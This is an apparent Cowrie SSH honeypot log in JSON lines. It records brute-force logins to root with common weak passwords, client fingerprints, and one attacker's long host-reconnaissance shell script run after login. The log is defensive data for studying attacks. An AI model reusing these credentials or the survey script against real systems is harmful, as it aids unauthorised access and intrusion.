gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:35:30.999042Z","src_ip":"185.93.89.7","session":"a3cc3cbb3c29"}
{"eventid":"cowrie.login.success","username":"root","password":"Index","message":"login attempt [root/Index] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:35:31.059276Z","src_ip":"185.93.89.7","session":"a3cc3cbb3c29"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:35:31.078646Z","src_ip":"185.93.89.7","session":"a3cc3cbb3c29"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":58512,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ac88511160e","protocol":"ssh","message":"New connection: 51.79.164.132:58512 (1.2.3.4:22) [session: 5ac88511160e]","sensor":"my-vps","timestamp":"2025-08-28T08:35:39.883936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:35:39.976995Z","src_ip":"51.79.164.132","session":"5ac88511160e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:35:40.511156Z","src_ip":"51.79.164.132","session":"5ac88511160e"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd","message":"login attempt [root/P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:35:42.090156Z","src_ip":"51.79.164.132","session":"5ac88511160e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:35:43.153681Z","src_ip":"51.79.164.132","session":"5ac88511160e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:35:43.154429Z","src_ip":"51.79.164.132","session":"5ac88511160e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:35:43.510592Z","src_ip":"51.79.164.132","session":"5ac88511160e"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:35:43.511683Z","src_ip":"51.79.164.132","session":"5ac88511160e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6101,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0b5d2ed7164","protocol":"ssh","message":"New connection: 212.227.235.229:6101 (1.2.3.4:22) [session: b0b5d2ed7164]","sensor":"my-vps","timestamp":"2025-08-28T08:35:49.012043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-28T08:35:49.137253Z","src_ip":"212.227.235.229","session":"b0b5d2ed7164"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T08:35:49.229935Z","src_ip":"212.227.235.229","session":"b0b5d2ed7164"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55442,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca6987ba7324","protocol":"ssh","message":"New connection: 212.227.235.229:55442 (1.2.3.4:22) [session: ca6987ba7324]","sensor":"my-vps","timestamp":"2025-08-28T08:35:49.829917Z"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T08:35:50.362181Z","src_ip":"212.227.235.229","session":"b0b5d2ed7164"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:35:50.363782Z","src_ip":"212.227.235.229","session":"b0b5d2ed7164"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:35:57.355072Z","src_ip":"212.227.235.229","session":"ca6987ba7324"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T08:35:57.355939Z","src_ip":"212.227.235.229","session":"ca6987ba7324"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":51946,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1c69cad1c89","protocol":"ssh","message":"New connection: 185.93.89.7:51946 (1.2.3.4:22) [session: c1c69cad1c89]","sensor":"my-vps","timestamp":"2025-08-28T08:36:06.048638Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:36:06.049293Z","src_ip":"185.93.89.7","session":"c1c69cad1c89"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:36:06.067405Z","src_ip":"185.93.89.7","session":"c1c69cad1c89"}
{"eventid":"cowrie.login.success","username":"root","password":"index!","message":"login attempt [root/index!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:36:06.104868Z","src_ip":"185.93.89.7","session":"c1c69cad1c89"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:36:06.123566Z","src_ip":"185.93.89.7","session":"c1c69cad1c89"}
{"eventid":"cowrie.login.success","username":"root","password":"password1","message":"login attempt [root/password1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:36:06.143030Z","src_ip":"212.227.235.229","session":"ca6987ba7324"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:36:07.115865Z","src_ip":"212.227.235.229","session":"ca6987ba7324"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T08:36:07.116615Z","src_ip":"212.227.235.229","session":"ca6987ba7324"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:36:07.117110Z","src_ip":"212.227.235.229","session":"ca6987ba7324"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:36:07.118115Z","src_ip":"212.227.235.229","session":"ca6987ba7324"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T08:36:07.119057Z","src_ip":"212.227.235.229","session":"ca6987ba7324"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:36:07.120277Z","src_ip":"212.227.235.229","session":"ca6987ba7324"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:36:07.120899Z","src_ip":"212.227.235.229","session":"ca6987ba7324"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T08:36:07.121910Z","src_ip":"212.227.235.229","session":"ca6987ba7324"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T08:36:07.122355Z","src_ip":"212.227.235.229","session":"ca6987ba7324"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:36:07.122852Z","src_ip":"212.227.235.229","session":"ca6987ba7324"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:36:07.123332Z","src_ip":"212.227.235.229","session":"ca6987ba7324"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:36:07.123882Z","src_ip":"212.227.235.229","session":"ca6987ba7324"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:36:07.124447Z","src_ip":"212.227.235.229","session":"ca6987ba7324"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":38176,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d45b24459e8","protocol":"ssh","message":"New connection: 51.79.164.132:38176 (1.2.3.4:22) [session: 8d45b24459e8]","sensor":"my-vps","timestamp":"2025-08-28T08:36:07.125970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:36:07.238699Z","src_ip":"51.79.164.132","session":"8d45b24459e8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:36:08.175141Z","src_ip":"51.79.164.132","session":"8d45b24459e8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T08:36:08.394582Z","src_ip":"212.227.235.229","session":"ca6987ba7324"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:36:08.395477Z","src_ip":"212.227.235.229","session":"ca6987ba7324"}
{"eventid":"cowrie.session.closed","duration":"18.6","message":"Connection lost after 18.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:36:08.396701Z","src_ip":"212.227.235.229","session":"ca6987ba7324"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz@WSX","message":"login attempt [root/!qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:36:09.254239Z","src_ip":"51.79.164.132","session":"8d45b24459e8"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":49013,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6cd5ad9cbd3","protocol":"ssh","message":"New connection: 80.94.95.15:49013 (1.2.3.4:22) [session: a6cd5ad9cbd3]","sensor":"my-vps","timestamp":"2025-08-28T08:36:10.069122Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T08:36:10.070088Z","src_ip":"80.94.95.15","session":"a6cd5ad9cbd3"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T08:36:10.121236Z","src_ip":"80.94.95.15","session":"a6cd5ad9cbd3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:36:10.290493Z","src_ip":"51.79.164.132","session":"8d45b24459e8"}
